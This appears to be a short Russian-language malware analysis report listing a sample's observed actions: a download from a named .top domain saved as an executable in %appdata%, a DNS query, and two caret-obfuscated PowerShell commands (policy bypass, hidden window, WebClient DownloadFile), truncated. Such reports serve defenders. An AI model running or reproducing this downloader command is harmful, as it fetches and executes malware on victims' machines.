Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^ERShel^L.^EXe -Exe^Cu^T^IOnpOLIcy b^yPa^ss -no^p^ro^fILe -^WIn^dOWS^t^Yl^E h^i^ddeN^ (^n^Ew-ob^je^CT S^Ystem^.N^ET.wE^bC^lIE^n^T)^.d^O^WN^LOaDF^i^LE('http://www.zonedopesa.to...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "POW^ERShel^L.^EXe -Exe^Cu^T^IOnpOLIcy b^yPa^ss -no^p^ro^fILe -^WIn^dOWS^t^Yl^E h^i^ddeN^ (^n^Ew-ob^je^CT S^Ystem^.N^ET.wE^bC^lIE^n^T)^.d^O^WN^LOaDF^i^LE('http://www.zonedopesa.to...' (со скрытым окном)